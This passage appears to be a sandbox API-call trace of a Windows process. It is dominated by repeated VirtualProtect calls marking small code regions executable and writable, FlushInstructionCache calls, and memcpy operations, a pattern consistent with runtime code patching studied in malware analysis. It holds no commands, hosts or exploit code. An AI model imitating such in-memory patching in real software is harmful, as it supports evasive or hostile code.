GetCurrentProcess () returned 0xffffffff [0103.895] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0103.895] GetCurrentProcess () returned 0xffffffff [0103.895] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0103.895] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.895] GetCurrentProcess () returned 0xffffffff [0103.895] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0103.895] GetCurrentProcess () returned 0xffffffff [0103.895] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0103.895] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.896] GetCurrentProcess () returned 0xffffffff [0103.896] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0103.896] GetCurrentProcess () returned 0xffffffff [0103.896] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0103.896] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.896] GetCurrentProcess () returned 0xffffffff [0103.896] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0103.896] GetCurrentProcess () returned 0xffffffff [0103.896] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0103.896] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.897] GetCurrentProcess () returned 0xffffffff [0103.897] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0103.897] GetCurrentProcess () returned 0xffffffff [0103.897] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0103.897] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.897] GetCurrentProcess () returned 0xffffffff [0103.897] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0103.897] GetCurrentProcess () returned 0xffffffff [0103.897] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0103.897] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.898] GetCurrentProcess () returned 0xffffffff [0103.898] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0103.898] GetCurrentProcess () returned 0xffffffff [0103.898] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0103.898] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.898] GetCurrentProcess () returned 0xffffffff [0103.898] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0103.898] GetCurrentProcess () returned 0xffffffff [0103.898] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0103.898] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.899] GetCurrentProcess () returned 0xffffffff [0103.899] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0103.899] GetCurrentProcess () returned 0xffffffff [0103.899] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0103.899] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.899] GetCurrentProcess () returned 0xffffffff [0103.899] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0103.899] GetCurrentProcess () returned 0xffffffff [0103.899] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0103.899] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.900] GetCurrentProcess () returned 0xffffffff [0103.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0103.900] GetCurrentProcess () returned 0xffffffff [0103.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0103.900] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.900] GetCurrentProcess () returned 0xffffffff [0103.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0103.900] GetCurrentProcess () returned 0xffffffff [0103.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0103.900] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.955] GetCurrentProcess () returned 0xffffffff [0103.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0103.955] GetCurrentProcess () returned 0xffffffff [0103.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0103.956] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.956] GetCurrentProcess () returned 0xffffffff [0103.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0103.956] GetCurrentProcess () returned 0xffffffff [0103.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0103.956] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.957] GetCurrentProcess () returned 0xffffffff [0103.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0103.957] GetCurrentProcess () returned 0xffffffff [0103.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0103.957] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.957] GetCurrentProcess () returned 0xffffffff [0103.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0103.957] GetCurrentProcess () returned 0xffffffff [0103.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0103.957] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.958] GetCurrentProcess () returned 0xffffffff [0103.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0103.958] GetCurrentProcess () returned 0xffffffff [0103.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0103.958] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.958] GetCurrentProcess () returned 0xffffffff [0103.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0103.958] GetCurrentProcess () returned 0xffffffff [0103.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0103.959] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.959] GetCurrentProcess () returned 0xffffffff [0103.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0103.959] GetCurrentProcess () returned 0xffffffff [0103.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0103.959] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.960] GetCurrentProcess () returned 0xffffffff [0103.960] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0103.960] GetCurrentProcess () returned 0xffffffff [0103.960] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0103.960] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.960] GetCurrentProcess () returned 0xffffffff [0103.960] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0103.961] GetAsyncKeyState (vKey=3) returned 0 [0103.961] CRetailMalloc_Alloc () returned 0xcac6ee8 [0103.962] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.962] memcpy (in: _Dst=0xaf5270, _Src=0x197748, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.962] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.962] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.962] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.962] memcpy (in: _Dst=0xaf516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.962] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.962] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.962] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.962] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.962] memcpy (in: _Dst=0xaf516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.963] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.963] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.963] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.963] memcpy (in: _Dst=0xaf5168, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.963] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.963] CRetailMalloc_Realloc () returned 0xb3c9130 [0103.964] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.964] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.964] memcpy (in: _Dst=0xaf5168, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.964] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.964] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.965] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.965] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.965] memcpy (in: _Dst=0xaf516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.965] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.965] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.965] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.965] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.965] memcpy (in: _Dst=0xaf516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.965] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.966] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.966] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.966] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.966] memcpy (in: _Dst=0xaf516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.966] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.966] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.966] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.966] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.966] memcpy (in: _Dst=0xaf516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.966] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.967] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.967] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.967] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.967] memcpy (in: _Dst=0xaf516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.967] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.967] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.967] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.967] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.967] memcpy (in: _Dst=0xaf516c, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.967] memcpy (in: _Dst=0xaf5170, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0103.967] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.968] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.968] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.968] memcpy (in: _Dst=0xaf5168, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.968] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.968] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.968] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.968] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.968] memcpy (in: _Dst=0xaf516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.968] memcpy (in: _Dst=0xaf5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.972] CRetailMalloc_Alloc () returned 0xc8d5868 [0103.972] memcpy (in: _Dst=0xc8d5868, _Src=0x0, _Size=0x0 | out: _Dst=0xc8d5868) returned 0xc8d5868 [0103.972] memcpy (in: _Dst=0xcac7184, _Src=0x1977e4, _Size=0x18 | out: _Dst=0xcac7184) returned 0xcac7184 [0103.972] memcpy (in: _Dst=0xcac71c6, _Src=0xc8d5868, _Size=0x2 | out: _Dst=0xcac71c6) returned 0xcac71c6 [0103.972] CRetailMalloc_Realloc () returned 0xcac6ee8 [0103.972] CRetailMalloc_Free () returned 0x1 [0103.972] CRetailMalloc_Free () returned 0x1 [0103.972] GetCurrentProcess () returned 0xffffffff [0103.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0103.972] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.973] GetCurrentProcess () returned 0xffffffff [0103.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0103.973] GetCurrentProcess () returned 0xffffffff [0103.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0103.973] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.973] GetCurrentProcess () returned 0xffffffff [0103.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0103.973] GetCurrentProcess () returned 0xffffffff [0103.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0103.973] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.974] GetCurrentProcess () returned 0xffffffff [0103.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0103.974] GetCurrentProcess () returned 0xffffffff [0103.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0103.974] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.974] GetCurrentProcess () returned 0xffffffff [0103.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0103.974] GetCurrentProcess () returned 0xffffffff [0103.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0103.974] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.975] GetCurrentProcess () returned 0xffffffff [0103.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0103.975] GetCurrentProcess () returned 0xffffffff [0103.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0103.975] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.975] GetCurrentProcess () returned 0xffffffff [0103.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0103.975] GetCurrentProcess () returned 0xffffffff [0103.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0103.975] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.976] GetCurrentProcess () returned 0xffffffff [0103.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0103.976] GetCurrentProcess () returned 0xffffffff [0103.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0103.976] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.976] GetCurrentProcess () returned 0xffffffff [0103.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0103.976] GetCurrentProcess () returned 0xffffffff [0103.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0103.976] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.977] GetCurrentProcess () returned 0xffffffff [0103.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0103.977] GetCurrentProcess () returned 0xffffffff [0103.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0103.977] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.977] GetCurrentProcess () returned 0xffffffff [0103.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0103.977] GetCurrentProcess () returned 0xffffffff [0103.977] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0103.977] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.978] GetCurrentProcess () returned 0xffffffff [0103.978] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0103.978] GetCurrentProcess () returned 0xffffffff [0103.978] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0103.978] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.979] GetCurrentProcess () returned 0xffffffff [0103.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0103.979] GetCurrentProcess () returned 0xffffffff [0103.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0103.979] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.979] GetCurrentProcess () returned 0xffffffff [0103.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0103.979] GetCurrentProcess () returned 0xffffffff [0103.979] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0103.979] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.980] GetCurrentProcess () returned 0xffffffff [0103.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0103.980] GetCurrentProcess () returned 0xffffffff [0103.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0103.980] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.980] GetCurrentProcess () returned 0xffffffff [0103.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0103.980] GetCurrentProcess () returned 0xffffffff [0103.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0103.980] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.981] GetCurrentProcess () returned 0xffffffff [0103.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0103.981] GetCurrentProcess () returned 0xffffffff [0103.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0103.981] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.981] GetCurrentProcess () returned 0xffffffff [0103.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0103.981] GetCurrentProcess () returned 0xffffffff [0103.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0103.981] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.982] GetCurrentProcess () returned 0xffffffff [0103.982] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0103.982] GetCurrentProcess () returned 0xffffffff [0103.982] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0103.982] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.982] GetCurrentProcess () returned 0xffffffff [0103.982] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0103.982] GetCurrentProcess () returned 0xffffffff [0103.982] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0103.982] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.983] 